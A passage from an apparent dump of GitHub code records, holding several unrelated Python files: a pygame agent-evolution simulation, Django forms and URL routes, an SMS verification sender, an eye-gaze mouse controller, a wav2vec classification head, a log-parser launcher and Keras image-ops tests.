_lista_comidas\n        self.lista_agentes = _lista_agentes\n        self.id_partner = int\n        self.comidas_comidas = 0\n        # print(self.comidas_comidas)\n\n    def actual(self, screen):\n        # \"Camina\" (walk) state\n        if self.currentEstado == self.Estados[1]:\n            if self.energia > 0:\n                self.mover_A([random.randint(0, screen.get_width()), random.randint(0, 
screen.get_height())])\n if self.energia >= 200:\n self.currentEstado = self.Estados[6] # Busca_pareja\n elif 0 < self.energia < 200:\n self.currentEstado = self.Estados[3] # Busca_comida\n self.energia -= 1\n else:\n self.currentEstado = self.Estados[7]\n\n # Come\n if self.currentEstado == self.Estados[2]:\n # print(self.my_fud, \"mio\")\n # print(self.energia)\n if self.my_fud is not None:\n # if self.objetivo(self.my_fud.get_pos(), 3.5):\n if self.objetivo2(self.my_fud):\n if self.my_fud.is_eaten() is False:\n self.energia += self.my_fud.alimento\n self.comidas_comidas += 1\n self.my_fud.eaten()\n self.my_fud = None\n self.best = 300\n self.currentEstado = self.Estados[1]\n else:\n self.currentEstado = self.Estados[3]\n else:\n self.currentEstado = self.Estados[3]\n else:\n self.currentEstado = self.Estados[3]\n self.energia -= 0.5\n if self.energia <= 50:\n self.currentEstado = self.Estados[3] # Busca_comida\n if self.energia > 50:\n self.currentEstado = self.Estados[1] # Camina\n # Busca_comida\n if self.currentEstado == self.Estados[3]:\n # print(\"hm\")\n if self.my_fud is not None:\n if self.my_fud.is_eaten() is False:\n # self.mover_A(self.my_fud.get_pos())\n self.mover_A_entidad(self.my_fud)\n # if self.objetivo(self.my_fud.get_pos(), 2.5):\n if self.objetivo2(self.my_fud):\n self.currentEstado = self.Estados[2]\n else:\n self.my_fud = None\n self.currentEstado = self.Estados[1]\n else:\n # self.currentEstado = self.Estados[3]\n self.best = 300\n self.buscar_comida()\n if self.my_fud is None:\n self.currentEstado = self.Estados[1]\n if self.buscar_comida() is False:\n self.currentEstado = self.Estados[1]\n self.energia -= 0.5\n # Reproduce\n if self.currentEstado == self.Estados[5]:\n # print(\"AAAA\")\n if self.is_willing() and self.my_partner.is_willing():\n # if self.objetivo(self.my_partner.get_pos(), 3.5):\n if self.objetivo2(self.my_partner):\n self.crear_hijo()\n # print(\"boom un hijo\", self.energia, self.currentEstado)\n elif self.energia >= 100:\n # self.mover_A(self.my_partner.get_pos())\n self.mover_A_entidad(self.my_partner)\n else:\n self.currentEstado = self.Estados[1]\n # self.my_partner=None\n elif self.energia >= 200:\n self.currentEstado = self.Estados[6]\n else:\n self.currentEstado = self.Estados[1]\n self.energia -= 1\n # if self.currentEstado == self.Estados[5]:\n # if self.energia >= 200:\n # nuevo_agente = Person(float(self.velocidad),\n # float(self.posicion.x + 20),\n # float(self.posicion.y), self.lista_comidas, self.lista_agentes,\n # (self.color[0], self.color[1] + 10, 0)\n # )\n # self.lista_agentes.append(nuevo_agente)\n # self.energia -= 20\n # self.currentEstado = self.Estados[1]\n # # print(\"boom un hijo\", self.energia, self.currentEstado)\n # self.currentEstado = self.Estados[1]\n # Busca_pareja\n if self.currentEstado == self.Estados[6]:\n # print(\"ojo\")\n self.willing = True\n if self.my_partner is not None:\n if self.my_partner.is_willing() is True:\n # self.mover_A(self.my_partner.get_pos())\n self.mover_A_entidad(self.my_partner)\n # if self.objetivo(self.my_partner.get_pos(), 2.5):\n if self.objetivo2(self.my_partner):\n self.currentEstado = self.Estados[5]\n else:\n self.my_partner = None\n self.currentEstado = self.Estados[1]\n else:\n self.distance_search_partner = 600\n self.buscar_pareja()\n if self.my_partner is None:\n if self.energia <= 100:\n self.willing = False\n self.currentEstado = self.Estados[1]\n else:\n self.currentEstado = self.Estados[1]\n\n # if self.my_partner is None or self.energia <= 100:\n # 
self.willing=False\n # self.currentEstado = self.Estados[1]\n elif self.buscar_pareja() is False:\n self.currentEstado = self.Estados[1]\n self.energia -= 0.5\n # Muere\n if self.currentEstado == self.Estados[7]:\n self.is_ded = True\n comida = Comida(self.posicion.x, self.posicion.y, 40, color=colors.BLACK)\n self.lista_comidas.append(comida)\n # print(\"ded\")\n # print(self.energia)\n # print(self.currentEstado)\n pygame.draw.circle(screen, self.color, self.posicion, self.radio)\n\n # Acá calcula que tan lejos esta del objetivo al que está yendo\n def objetivo(self, _objetivo, _dis):\n return pygame.Vector2.length(self.posicion - _objetivo) <= _dis\n\n def objetivo2(self, _objetivo):\n return pygame.Vector2.length(self.posicion - _objetivo.posicion) <= abs(self.radio-_objetivo.radio)\n\n def buscar_comida(self):\n if self.lista_comidas:\n for _ in range(len(self.lista_comidas)):\n temp_comida = self.lista_comidas[_].get_pos()\n dist = pygame.Vector2.length(temp_comida - self.posicion)\n if dist <= self.best:\n self.my_fud = self.lista_comidas[_]\n self.best = dist\n self.id_comida = self.lista_comidas.index(self.lista_comidas[_])\n else:\n return False\n # print(self.lista_comidas[self.id_comida], \"mundo\")\n # print(self.lista_comidas[self.id_comida] is self.my_fud, \"es?\")\n\n def buscar_pareja(self):\n if self.lista_agentes:\n for _ in range(len(self.lista_agentes)):\n if self.lista_agentes[_] is not self:\n temp_agente = self.lista_agentes[_].get_pos()\n dist = pygame.Vector2.length(temp_agente - self.posicion)\n if dist <= self.best and self.lista_agentes[_].my_partner is None \\\n and self.lista_agentes[_].is_willing():\n self.my_partner = self.lista_agentes[_]\n self.distance_search_partner = dist\n self.lista_agentes[_].my_partner = self\n self.id_partner = self.lista_agentes.index(self.lista_agentes[_])\n else:\n return False\n # print(self.lista_comidas[self.id_comida], \"mundo\")\n # print(self.lista_comidas[self.id_comida] is self.my_fud, \"es?\")\n\n def mover_A(self, _objetivo):\n dist = self.posicion - _objetivo\n if not dist.length()<=0:\n delta = pygame.Vector2.normalize(dist)\n if not self.is_ded:\n if not self.objetivo(_objetivo=_objetivo, _dis=2.5):\n # if not self.objetivo2(_objetivo=_objetivo):\n if not dist.length() < self.velocidad:\n self.posicion -= delta * self.velocidad\n else:\n self.posicion -= delta * dist.length()\n else: self.currentEstado = self.Estados[7]\n else: self.currentEstado=self.Estados[2]\n\n def mover_A_entidad(self, _objetivo):\n dist = self.posicion - _objetivo.posicion\n if not dist.length()<=0:\n delta = pygame.Vector2.normalize(dist)\n if not self.is_ded:\n if not self.objetivo2(_objetivo=_objetivo):\n if not dist.length() < self.velocidad:\n self.posicion -= delta * self.velocidad\n else:\n self.posicion -= delta * dist.length()\n else: self.currentEstado=self.Estados[7]\n\n def get_pos(self):\n return self.posicion\n\n def is_willing(self):\n return self.willing\n\n def crear_hijo(self):\n #### posicion\n temp_pos = pygame.Vector2((self.posicion.x + self.my_partner.get_pos().x) / 2,\n (self.posicion.y + self.my_partner.get_pos().y) / 2)\n #### velocidad\n if 1 - self.mutacion > random.random() > 0.5:\n temp_speed = float(self.velocidad)\n elif self.mutacion < random.random() <= 0.5:\n temp_speed = float(self.my_partner.velocidad)\n else:\n temp_speed = (float(self.velocidad) + float(self.my_partner.velocidad)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5: temp_speed += random.uniform(-0.5, 0.5)\n if temp_speed 
<= 0: temp_speed = 0.1\n #### color\n temp_color = [0, 0, 0]\n if 1 - self.mutacion > random.random() > 0.5:\n temp_color = [self.color[0], self.color[1], self.color[2]]\n elif self.mutacion < random.random() <= 0.5:\n temp_color = [self.my_partner.color[0], self.my_partner.color[1], self.my_partner.color[2]]\n else:\n for _ in range(len(temp_color)):\n temp_color[_] = round((self.color[_] + self.my_partner.color[_]) / 2)\n if random.random() < self.mutacion:\n for _ in range(len(temp_color)):\n if random.random() < 0.5:\n temp_color[_] += random.randint(-10, 10)\n if temp_color[_] > 255:\n temp_color[_] = 255\n elif temp_color[_] < 0:\n temp_color[_] = 0\n #### radio\n if 1 - self.mutacion > random.random() > 0.5:\n temp_radius = float(self.radio)\n elif self.mutacion < random.random() <= 0.5:\n temp_radius = float(self.my_partner.radio)\n else:\n temp_radius = (float(self.radio) + float(self.my_partner.radio)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_radius += random.uniform(-0.5, 0.5)\n if temp_radius > 10:\n temp_radius = 10\n elif temp_radius < 1:\n temp_radius = 1\n #### energia_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_energia = float(self.energia_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_energia = float(self.my_partner.energia_max)\n else:\n temp_energia = (float(self.energia_max) + float(self.my_partner.energia_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_energia += 0.1\n else:\n temp_energia -= 0.1\n if temp_energia > 8:\n temp_energia = 8\n elif temp_energia < 1:\n temp_energia = 1\n #### best_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_best = float(self.best_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_best = float(self.my_partner.best_max)\n else:\n temp_best = (float(self.best_max) + float(self.my_partner.best_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_best += 0.1\n else:\n temp_best -= 0.1\n if temp_best > 8:\n temp_best = 8\n elif temp_best < 1:\n temp_best = 1\n #### distance_search_partner_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_partner_max = float(self.distance_search_partner_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_partner_max = float(self.my_partner.distance_search_partner_max)\n else:\n temp_partner_max = (float(self.distance_search_partner_max) + float(\n self.my_partner.distance_search_partner_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_partner_max += 0.1\n else:\n temp_partner_max -= 0.1\n if temp_partner_max > 8:\n temp_partner_max = 8\n elif temp_partner_max < 1:\n temp_partner_max = 1\n adn_ = [temp_speed, temp_color, temp_radius, temp_energia, temp_best, temp_partner_max]\n adn_string = ''.join([str(item) for item in adn_])\n print(adn_string)\n print(adn_string[0])\n\n # nuevo_agente = Person(temp_pos.x, temp_pos.y,\n # self.lista_comidas, self.lista_agentes,\n # temp_speed, temp_color\n # )\n nuevo_agente = Person(temp_pos.x, temp_pos.y, self.lista_comidas,\n self.lista_agentes, adn_\n )\n self.lista_agentes.append(nuevo_agente)\n self.energia -= 75\n self.my_partner.energia -= 75\n self.willing = False\n self.my_partner.willing = False\n self.distance_search_partner = 600\n self.my_partner.distance_search_partner = 600\n self.my_partner.currentEstado = self.Estados[1]\n self.currentEstado = self.Estados[1]\n self.id_partner = None\n self.my_partner = 
None\n","repo_name":"HamillCavero/TF_inteligencia_artificial","sub_path":"v3/agente_v3.py","file_name":"agente_v3.py","file_ext":"py","file_size_in_byte":16227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12734065022","text":"from django import forms\n\nfrom apps.Entidades.models import aplicacion, cargo, ubicacion, historico_creacion_persona, persona, eliminacion_aplicacion, creacion_aplicacion, usuario, historico_eliminacion_persona\n\nclass PersonaForm_addaplicacion(forms.ModelForm):\n class Meta:\n model = persona\n\n fields = [\n 'nombre_completo',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'aplicaciones': forms.CheckboxSelectMultiple(attrs={'class': 'checkbox_aplicaciones checkbox'}),\n 'nombre_completo': forms.TextInput(attrs={'class': 'nombre_completo_de_adicion_aplicacion'}),\n 'cargo': forms.TextInput(attrs={'class': 'cargo_de_adicion_aplicacion'}),\n 'ubicacion': forms.TextInput(attrs={'class': 'ubicacion_de_adicion_aplicacion'}),\n 'centro': forms.TextInput(attrs={'class': 'centro_de_adicion_aplicacion'}),\n }\n\nclass PersonaForm(forms.ModelForm):\n class Meta:\n model = persona\n fields = [\n 'nombre_completo',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'aplicaciones': forms.CheckboxSelectMultiple(attrs={'class': 'checkbox_aplicaciones_crear_persona_nueva checkbox','id': 'id_aplicaciones_de_persona_nueva'}),\n 'nombre_completo': forms.TextInput(attrs={'id': 'id_nombre_completo_persona_nueva','class':'form-control'}),\n 'cargo': forms.Select(attrs={'id': 'id_cargo_persona_nueva','class':'form-control'}),\n 'ubicacion': forms.Select(attrs={'id': 'id_ubicacion_persona_nueva','class':'form-control'}),\n 'centro': forms.Select(attrs={'id': 'id_centro_persona_nueva','class':'form-control'}),\n }\n\nclass EditarPersonaForm(forms.ModelForm):\n class Meta:\n model = persona\n fields = [\n 'nombre_completo',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'nombre_completo': forms.TextInput(attrs={'class': 'form-control'}),\n 'cargo': forms.Select(attrs={'class': 'form-control'}),\n 'ubicacion': forms.Select(attrs={'class': 'form-control'}),\n 'centro': forms.Select(attrs={'class': 'form-control'}),\n }\n\nclass UsuarioForm(forms.ModelForm):\n class Meta:\n model = usuario\n\n fields = [\n 'usuario',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'ticket',\n ]\n\n\nclass HistoricoForm_creacion_persona(forms.ModelForm):\n class Meta:\n model = historico_creacion_persona\n\n fields = [\n 'persona',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\nclass HistoricoForm_eliminacion_persona(forms.ModelForm):\n class Meta:\n model = historico_eliminacion_persona\n\n fields = [\n 'persona',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n\nclass AplicacionForm(forms.ModelForm):\n class Meta:\n model = creacion_aplicacion\n\n fields = [\n 'ticket',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'usuario',\n ]\n\nclass AplicacionForm_eliminacion(forms.ModelForm):\n class Meta:\n model = eliminacion_aplicacion\n\n fields = [\n 'ticket',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'usuario',\n ]\n","repo_name":"mhichel/Cecilia","sub_path":"apps/Entidades/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"12299428102","text":"#! 
/usr/bin/env python\n# coding=utf-8\n\nimport ast\nimport time\nimport json\nimport random\nimport hashlib\nimport http.client\n\nfrom dao_quote.settings.config_x import (SDKAPPID, APPKEY)\n\n\ndef sms_sender(nationCode, phoneNumber, content):\n url = \"https://yun.tim.qq.com/v5/tlssmssvr/sendsms\"\n rnd = random.randint(100000, 999999)\n time_sms = int(time.time())\n sig = hashlib.sha256('appkey={}&random={}&time={}&mobile={}'.format(\n APPKEY, rnd, time_sms, phoneNumber\n ).encode(\"utf-8\")).hexdigest()\n pkg = {\n \"ext\": \"\",\n \"extend\": \"\",\n \"msg\": content,\n \"sig\": sig,\n \"tel\": {\n \"mobile\": phoneNumber,\n \"nationcode\": nationCode,\n },\n \"time\": time_sms,\n \"type\": 0\n }\n con = None\n data = {'fee': 0}\n try:\n con = http.client.HTTPSConnection('yun.tim.qq.com', timeout=5)\n body = json.dumps(pkg)\n wholeUrl = '{}?sdkappid={}&random={}'.format(\n url, SDKAPPID, rnd)\n con.request('POST', wholeUrl, body)\n response = con.getresponse()\n resp = response.read()\n resp = resp.decode('utf-8')\n data = ast.literal_eval(resp)\n if 'fee' in data:\n pass\n else:\n data['fee'] = 0\n except Exception as e:\n print(e)\n finally:\n if(con):\n con.close()\n return data\n\n\ndef send_vcode(nationCode, phoneNumber, code):\n content = \"【道科技DaoTec】您的验证码是:{},3分钟内有效,切勿将验证码泄露于他人。\".format(code)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef send_order_reminder(nationCode, phoneNumber, strategy_name, order_info):\n content = (\"【道科技DaoTec】尊敬的客户您好!您运行的{}策略有新订单了,\"\n \"订单细节为{},更多行情信息请关注道科技。\").format(strategy_name, order_info)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef send_strategy_reminder(nationCode, phoneNumber, strategy_name, reminder_type):\n if (reminder_type == 'err'):\n reminder_type = '异常'\n else:\n pass\n content = (\"【道科技DaoTec】尊敬的客户您好!您运行的策略{}最新状态为{},\"\n \"更多信息请登录道科技。\").format(strategy_name, reminder_type)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Maxwellpower1/fsb","sub_path":"dao_quote/dao_quote/util/verify/sms/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37931757611","text":"\"\"\"xiaohei URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom trade.views import OrderInfoViewSet, ShoppingCartViewSet, AliPayView, AliPayView2\n\nrouter = DefaultRouter()\nrouter.register(r'tradeCart', OrderInfoViewSet, basename='tradeCart')  # order info\nrouter.register(r'ShopCart', ShoppingCartViewSet, basename='ShoppingCart')  # shopping cart\nrouter.register(r'AliPay', AliPayView, basename='AliPay')\n\nurlpatterns = [\n    url(r'^', include(router.urls)),\n    url(r'^ShoppingCart/$', ShoppingCartViewSet.as_view({'get': 'list'}), name='cartList'),  # cart list\n    # url('^AliPay/$', AliPayView.as_view(), name='AliPay'),  # user\n    url(r'alipay/return/$', AliPayView2.as_view(), name='alipay')\n]\n","repo_name":"nieluyi/DjangoWeb","sub_path":"xiaohei/xiaohei/apps/trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"}
+{"seq_id":"6898088335","text":"import cv2\r\nimport numpy as np\r\nimport dlib\r\nfrom math import hypot\r\nimport pyautogui\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ndetector = dlib.get_frontal_face_detector()  # this only gets the position of the face\r\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")  # this gets the position of facial landmarks in our image\r\n\r\ndef midpoint(p1, p2):\r\n    return int((p1.x + p2.x)/2), int((p1.y + p2.y)/2)\r\n\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\ndef get_blinking_ratio(eye_points, facial_landmarks):\r\n    '''This function draws a horizontal and a vertical line across the eye and returns their ratio.\r\n    This is useful for detecting if someone is blinking or not.\r\n    Here we have only used the left eye as our reference. Sometimes it may happen that people with a damaged eye 
Sometimes it may happen that people with damaged eye \r\n can select the eye that they think would be useful for calibration'''\r\n left_point = (facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y)\r\n right_point = (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y)\r\n center_top = midpoint(facial_landmarks.part(eye_points[1]), facial_landmarks.part(eye_points[2]))\r\n center_bottom = midpoint(facial_landmarks.part(eye_points[5]), facial_landmarks.part(eye_points[4]))\r\n\r\n #hor_line = cv2.line(frame, left_point, right_point, (0, 255, 0), 2)\r\n #ver_line = cv2.line(frame, center_top, center_bottom, (0, 255, 0), 2)\r\n\r\n hor_line_length = hypot((left_point[0] - right_point[0]), (left_point[1] - right_point[1]))\r\n ver_line_length = hypot((center_top[0] - center_bottom[0]), (center_top[1] - center_bottom[1]))\r\n\r\n ratio = hor_line_length / ver_line_length\r\n return ratio\r\n\r\ndef get_gaze_ratio(eye_points, facial_landmarks):\r\n left_eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\r\n (facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\r\n (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\r\n (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\r\n (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\r\n (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)], np.int32)\r\n # cv2.polylines(frame, [left_eye_region], True, (0, 0, 255), 2)\r\n\r\n # This block deals with separating the eyes from the face\r\n height, width, _ = frame.shape\r\n mask = np.zeros((height, width), np.uint8)\r\n cv2.polylines(mask, [left_eye_region], True, 255, 2)\r\n cv2.fillPoly(mask, [left_eye_region], 255)\r\n eye = cv2.bitwise_and(gray, gray, mask=mask)\r\n\r\n min_x = np.min(left_eye_region[:, 0])\r\n max_x = np.max(left_eye_region[:, 0])\r\n min_y = np.min(left_eye_region[:, 1])\r\n max_y = np.max(left_eye_region[:, 1])\r\n \r\n ## Thesholding of the eye\r\n gray_eye = eye[min_y: max_y, min_x: max_x]\r\n #cv2.imshow(\"Eye\", gray_eye)\r\n _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\r\n height, width = threshold_eye.shape\r\n\r\n ## The left and right sclera ratio. 
We can divide it further but the accuracy will decrease\r\n    left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\r\n    left_side_white = cv2.countNonZero(left_side_threshold)\r\n\r\n    right_side_threshold = threshold_eye[0: height, int(width / 2): width]\r\n    right_side_white = cv2.countNonZero(right_side_threshold)\r\n\r\n    if left_side_white == 0:\r\n        gaze_ratio = 1\r\n    elif right_side_white == 0:\r\n        gaze_ratio = 5\r\n    else:\r\n        gaze_ratio = left_side_white / right_side_white\r\n    return gaze_ratio\r\n\r\nprev_time = 0.0  # timestamp of the last detected blink; two blinks within 1 s trigger a click\r\n\r\nwhile True:\r\n    _, frame = cap.read()\r\n    new_frame = np.zeros((500, 500, 3), np.uint8)\r\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n    screen_x, screen_y = pyautogui.size()\r\n\r\n    faces = detector(gray)\r\n    for face in faces:\r\n        x, y = face.left(), face.top()\r\n        x1, y1 = face.right(), face.bottom()\r\n        cv2.rectangle(frame, (x, y), (x1, y1), (0, 255, 0), 2)\r\n\r\n        landmarks = predictor(gray, face)\r\n\r\n        # Detect blinking\r\n        left_eye_ratio = get_blinking_ratio([36, 37, 38, 39, 40, 41], landmarks)\r\n        right_eye_ratio = get_blinking_ratio([42, 43, 44, 45, 46, 47], landmarks)\r\n        blinking_ratio = (left_eye_ratio + right_eye_ratio) / 2\r\n\r\n        if blinking_ratio > 5.7:\r\n            if time.time() - prev_time < 1:\r\n                pyautogui.click(x=screen_x-5, y=5)\r\n                break\r\n            cv2.putText(frame, \"BLINKING\", (100, 150), font, 7, (255, 0, 0))\r\n            prev_time = time.time()\r\n            print('Blinking')\r\n\r\n        # Gaze detection\r\n        '''This block will find the ratio of sclera and pupil for detection of gaze direction'''\r\n        gaze_ratio_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41], landmarks)\r\n        gaze_ratio_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47], landmarks)\r\n        gaze_ratio = (gaze_ratio_right_eye + gaze_ratio_left_eye) / 2\r\n\r\n        if gaze_ratio <= 1:\r\n            cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 3)\r\n            pyautogui.moveTo(x=screen_x-5, y=screen_y-5)\r\n            print('Right')\r\n        elif 1 < gaze_ratio < 3:\r\n            cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\r\n            pyautogui.moveTo(600, 300)\r\n            print('Center')\r\n        else:\r\n            cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\r\n            pyautogui.moveTo(5, 5)\r\n            print('Left')\r\n\r\n    cv2.imshow(\"Frame\", frame)\r\n\r\n    key = cv2.waitKey(1)\r\n    if key == 27:\r\n        break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"animeshsingh98/Unity_GUI","sub_path":"gaze_controlled_mousepointer.py","file_name":"gaze_controlled_mousepointer.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"43146502839","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass Wav2Vec2ClassificationHead(nn.Module):\n    \"\"\"Head for wav2vec classification task.\"\"\"\n\n    def __init__(self, config):\n        super().__init__()\n        self.dense = nn.Linear(config[\"hidden_size\"], config[\"hidden_size\"])\n        self.dropout = nn.Dropout(config[\"final_dropout\"])\n        self.out_proj = nn.Linear(config[\"hidden_size\"], config[\"num_labels\"])\n\n    def forward(self, features, return_feats, **kwargs):\n        x = features\n        x = self.dropout(x)\n        x = self.dense(x)\n        x = torch.tanh(x)\n        x = self.dropout(x)\n        if return_feats:\n            return x\n        x = self.out_proj(x)\n        return x
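\n\n\nif __name__ == \"__main__\":\n    # Illustrative smoke test, not from the original repo: the config values and\n    # batch size here are assumptions chosen only to exercise the module.\n    cfg = {\"hidden_size\": 768, \"final_dropout\": 0.1, \"num_labels\": 4}\n    head = Wav2Vec2ClassificationHead(cfg)\n    head.eval()  # disable dropout for a deterministic forward pass\n    pooled = torch.randn(2, 768)  # (batch, hidden_size) pooled wav2vec features\n    logits = head(pooled, return_feats=False)\n    print(logits.shape)  # torch.Size([2, 4])\n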
x","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"GE2E/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35146553129","text":"#install regex , pandas , numpy\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nimport fortigate as ft\r\nimport server_access as sa\r\nimport cisco_asa as ca\r\n\r\n\r\ndef main():\r\n print(\"ENTER THE FILE LOCATION---->>\")\r\n location=input()\r\n print(\"ENTER THE TYPE OF LOG----->>\")\r\n print(\"1>SERVER_ACCESS,2>FORTIGATE300D,3>CISCO_ASA\")\r\n choice=int(input())\r\n print(\"ENTER THE DESTINATION LOCATION(enter 'NO' if excel not required---->\")\r\n location2=input()\r\n if choice==2:\r\n ft.parse_fortigate(location,location2)\r\n elif choice==1:\r\n sa.parse_server_access(location,location2)\r\n elif choice==3:\r\n ca.parse_cisco(location,location2)\r\n else:\r\n print(\"INVALID ARGUMENTS,PLEASE TRY AGAIN\")\r\n\r\nif __name__==\"__main__\":\r\n main()\r\n\r\n","repo_name":"aayushmahajan-123/complete_log_parser","sub_path":"LOG_PARSER.py","file_name":"LOG_PARSER.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32468846349","text":"import numpy as np\nimport pytest\nimport tensorflow as tf\nfrom absl.testing import parameterized\n\nfrom keras_core import backend\nfrom keras_core import testing\nfrom keras_core.backend.common.keras_tensor import KerasTensor\nfrom keras_core.ops import image as kimage\n\n\nclass ImageOpsDynamicShapeTest(testing.TestCase):\n def test_resize(self):\n x = KerasTensor([None, 20, 20, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (None, 15, 15, 3))\n\n x = KerasTensor([None, None, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (15, 15, 3))\n\n def test_affine_transform(self):\n x = KerasTensor([None, 20, 20, 3])\n transform = KerasTensor([None, 8])\n out = kimage.affine_transform(x, transform)\n self.assertEqual(out.shape, (None, 20, 20, 3))\n\n def test_extract_patches(self):\n x = KerasTensor([None, 20, 20, 3])\n p_h, p_w = 5, 5\n out = kimage.extract_patches(x, (p_h, p_w))\n self.assertEqual(out.shape, (None, 4, 4, 75))\n\n\nclass ImageOpsStaticShapeTest(testing.TestCase):\n def test_resize(self):\n x = KerasTensor([20, 20, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (15, 15, 3))\n\n def test_affine_transform(self):\n x = KerasTensor([20, 20, 3])\n transform = KerasTensor([8])\n out = kimage.affine_transform(x, transform)\n self.assertEqual(out.shape, (20, 20, 3))\n\n def test_extract_patches(self):\n x = KerasTensor([20, 20, 3])\n p_h, p_w = 5, 5\n out = kimage.extract_patches(x, (p_h, p_w))\n self.assertEqual(out.shape, (4, 4, 75))\n\n\nclass ImageOpsCorrectnessTest(testing.TestCase, parameterized.TestCase):\n @parameterized.parameters(\n [\n (\"bilinear\", True, \"channels_last\"),\n (\"nearest\", True, \"channels_last\"),\n (\"lanczos3\", True, \"channels_last\"),\n (\"lanczos5\", True, \"channels_last\"),\n (\"bicubic\", True, \"channels_last\"),\n (\"bilinear\", False, \"channels_last\"),\n (\"nearest\", False, \"channels_last\"),\n (\"lanczos3\", False, \"channels_last\"),\n (\"lanczos5\", False, \"channels_last\"),\n (\"bicubic\", False, \"channels_last\"),\n (\"bilinear\", True, \"channels_first\"),\n ]\n )\n def test_resize(self, interpolation, antialias, 
